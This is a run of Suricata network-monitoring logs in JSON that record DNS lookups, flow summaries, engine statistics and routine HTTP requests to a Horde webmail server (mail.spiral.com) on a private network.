{"timestamp":"2020-02-29T00:13:21.000327+0000","flow_id":1573653137124388,"event_type":"flow","src_ip":"192.168.10.130","src_port":34804,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1155,"bytes_toclient":5991,"start":"2020-02-29T00:11:40.125988+0000","end":"2020-02-29T00:12:20.586218+0000","age":40,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:21.000929+0000","flow_id":957166403243598,"event_type":"flow","src_ip":"192.168.10.122","src_port":34478,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:08:20.380494+0000","end":"2020-02-29T00:08:20.488895+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:24.094571+0000","flow_id":875772497513137,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52752,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":409},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":770,"tx_id":0}} {"timestamp":"2020-02-29T00:13:24.749341+0000","flow_id":780334029631261,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36750,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57609,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:24.857976+0000","flow_id":780334029631261,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36750,"proto":"UDP","dns":{"type":"answer","id":57609,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:24.857976+0000","flow_id":780334029631261,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36750,"proto":"UDP","dns":{"type":"answer","id":57609,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:24.880383+0000","flow_id":1016531461094710,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34818,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:13:24.880383+0000","flow_id":1016531461094710,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34818,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":16,"tx_id":0}} {"timestamp":"2020-02-29T00:13:26.000189+0000","event_type":"stats","stats":{"uptime":14458,"capture":{"kernel_packets":135481,"kernel_drops":0},"decoder":{"pkts":135483,"bytes":93345767,"invalid":187,"ipv4":133988,"ipv6":8,"ethernet":135483,"raw":0,"null":0,"sll":0,"tcp":128680,"udp":5106,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7100224},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2771,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2787,"synack":2778,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1810,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2332,"failed_udp":112},"tx":{"http":4664,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2412}},"flow_mgr":{"closed_pruned":2745,"new_pruned":15,"est_pruned":2376,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23139,"memcap_state":0,"memcap_global":0},"http":{"memuse":109003,"memcap":0}}} {"timestamp":"2020-02-29T00:13:27.000158+0000","flow_id":427648475654620,"event_type":"flow","src_ip":"192.168.10.122","src_port":47740,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:08:26.322012+0000","end":"2020-02-29T00:08:26.430911+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:28.000628+0000","flow_id":58766619475456,"event_type":"flow","src_ip":"192.168.10.122","src_port":49361,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":174,"bytes_toclient":284,"start":"2020-02-29T00:08:26.884224+0000","end":"2020-02-29T00:08:27.119823+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:29.881739+0000","flow_id":1016531461094710,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34818,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:13:31.000242+0000","flow_id":1144822130078229,"event_type":"flow","src_ip":"192.168.10.130","src_port":34806,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1171,"bytes_toclient":6580,"start":"2020-02-29T00:12:20.586261+0000","end":"2020-02-29T00:12:30.427636+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:31.396069+0000","flow_id":400710460705573,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45826,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":56583,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:31.504125+0000","flow_id":400710460705573,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45826,"proto":"UDP","dns":{"type":"answer","id":56583,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:31.504125+0000","flow_id":400710460705573,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45826,"proto":"UDP","dns":{"type":"answer","id":56583,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:31.556421+0000","flow_id":1477849603888713,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34820,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:13:31.556421+0000","flow_id":1477849603888713,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34820,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":205,"tx_id":0}} {"timestamp":"2020-02-29T00:13:31.570323+0000","flow_id":1353815243338707,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42553,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57985,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:31.678579+0000","flow_id":1353815243338707,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42553,"proto":"UDP","dns":{"type":"answer","id":57985,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:31.678579+0000","flow_id":1353815243338707,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42553,"proto":"UDP","dns":{"type":"answer","id":57985,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:31.777304+0000","flow_id":1477849603888713,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34820,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5052}} {"timestamp":"2020-02-29T00:13:33.000151+0000","event_type":"stats","stats":{"uptime":14465,"capture":{"kernel_packets":135505,"kernel_drops":0},"decoder":{"pkts":135522,"bytes":93356849,"invalid":187,"ipv4":134023,"ipv6":8,"ethernet":135522,"raw":0,"null":0,"sll":0,"tcp":128709,"udp":5112,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7100224},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2773,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2789,"synack":2780,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1812,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2335,"failed_udp":112},"tx":{"http":4667,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2415}},"flow_mgr":{"closed_pruned":2746,"new_pruned":15,"est_pruned":2378,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23139,"memcap_state":0,"memcap_global":0},"http":{"memuse":121715,"memcap":0}}} {"timestamp":"2020-02-29T00:13:33.001385+0000","flow_id":204108328578649,"event_type":"flow","src_ip":"192.168.10.130","src_port":34808,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":9,"bytes_toserver":1215,"bytes_toclient":7636,"start":"2020-02-29T00:12:27.634457+0000","end":"2020-02-29T00:12:32.916036+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:36.778490+0000","flow_id":1477849603888713,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34820,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5052},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":21937,"tx_id":1}} {"timestamp":"2020-02-29T00:13:39.000406+0000","flow_id":1562984426416529,"event_type":"flow","src_ip":"192.168.10.122","src_port":38137,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:08:38.305553+0000","end":"2020-02-29T00:08:38.414838+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:40.000141+0000","event_type":"stats","stats":{"uptime":14472,"capture":{"kernel_packets":135522,"kernel_drops":0},"decoder":{"pkts":135525,"bytes":93357047,"invalid":187,"ipv4":134026,"ipv6":8,"ethernet":135525,"raw":0,"null":0,"sll":0,"tcp":128712,"udp":5112,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099648},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2773,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2789,"synack":2780,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1812,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2335,"failed_udp":112},"tx":{"http":4667,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2415}},"flow_mgr":{"closed_pruned":2747,"new_pruned":15,"est_pruned":2378,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22808,"memcap_state":0,"memcap_global":0},"http":{"memuse":69891,"memcap":0}}} {"timestamp":"2020-02-29T00:13:41.000382+0000","flow_id":454818455014582,"event_type":"flow","src_ip":"192.168.10.130","src_port":34812,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1079,"bytes_toclient":5726,"start":"2020-02-29T00:12:34.904374+0000","end":"2020-02-29T00:12:40.104449+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:44.000537+0000","flow_id":931899127526949,"event_type":"flow","src_ip":"192.168.10.81","src_port":52732,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":10,"bytes_toserver":969,"bytes_toclient":8961,"start":"2020-02-29T00:12:38.423461+0000","end":"2020-02-29T00:12:43.700773+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:46.283999+0000","flow_id":302931236246879,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36289,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":53267,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:46.392737+0000","flow_id":302931236246879,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36289,"proto":"UDP","dns":{"type":"answer","id":53267,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:46.392737+0000","flow_id":302931236246879,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36289,"proto":"UDP","dns":{"type":"answer","id":53267,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:46.542266+0000","flow_id":36578839428506,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34822,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7092}} {"timestamp":"2020-02-29T00:13:47.000164+0000","event_type":"stats","stats":{"uptime":14479,"capture":{"kernel_packets":135522,"kernel_drops":0},"decoder":{"pkts":135525,"bytes":93357047,"invalid":187,"ipv4":134026,"ipv6":8,"ethernet":135525,"raw":0,"null":0,"sll":0,"tcp":128712,"udp":5112,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2773,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2789,"synack":2780,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1812,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2335,"failed_udp":112},"tx":{"http":4667,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2415}},"flow_mgr":{"closed_pruned":2749,"new_pruned":15,"est_pruned":2379,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23139,"memcap_state":0,"memcap_global":0},"http":{"memuse":86717,"memcap":0}}} {"timestamp":"2020-02-29T00:13:50.000191+0000","flow_id":569176254904198,"event_type":"flow","src_ip":"192.168.10.81","src_port":52740,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":4,"pkts_toclient":2,"bytes_toserver":272,"bytes_toclient":140,"start":"2020-02-29T00:12:44.456582+0000","end":"2020-02-29T00:12:49.495013+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"13","tcp_flags_ts":"13","tcp_flags_tc":"13","syn":true,"fin":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:50.001136+0000","flow_id":618010033054210,"event_type":"flow","src_ip":"192.168.10.81","src_port":52738,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":23,"bytes_toserver":2113,"bytes_toclient":27714,"start":"2020-02-29T00:12:44.451074+0000","end":"2020-02-29T00:12:49.823477+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:50.001870+0000","flow_id":1828739838965696,"event_type":"flow","src_ip":"192.168.10.81","src_port":52742,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":4,"pkts_toclient":3,"bytes_toserver":272,"bytes_toclient":206,"start":"2020-02-29T00:12:44.456640+0000","end":"2020-02-29T00:12:49.495139+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"13","tcp_flags_ts":"13","tcp_flags_tc":"13","syn":true,"fin":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:51.000268+0000","flow_id":1572119837955811,"event_type":"flow","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":31,"pkts_toclient":45,"bytes_toserver":5382,"bytes_toclient":54890,"start":"2020-02-29T00:12:44.349923+0000","end":"2020-02-29T00:12:50.097921+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:51.000970+0000","flow_id":1404448609633777,"event_type":"flow","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":65,"pkts_toclient":106,"bytes_toserver":11740,"bytes_toclient":134404,"start":"2020-02-29T00:12:43.886257+0000","end":"2020-02-29T00:12:50.111525+0000","age":7,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:51.544391+0000","flow_id":36578839428506,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34822,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7092},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":38924,"tx_id":0}} {"timestamp":"2020-02-29T00:13:51.634397+0000","flow_id":720204489272861,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37890,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":38735,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:51.742601+0000","flow_id":720204489272861,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37890,"proto":"UDP","dns":{"type":"answer","id":38735,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:51.742601+0000","flow_id":720204489272861,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37890,"proto":"UDP","dns":{"type":"answer","id":38735,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:51.831022+0000","flow_id":1297456683777400,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34824,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8117}} {"timestamp":"2020-02-29T00:13:53.127322+0000","flow_id":902968232767834,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38101,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":60152,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 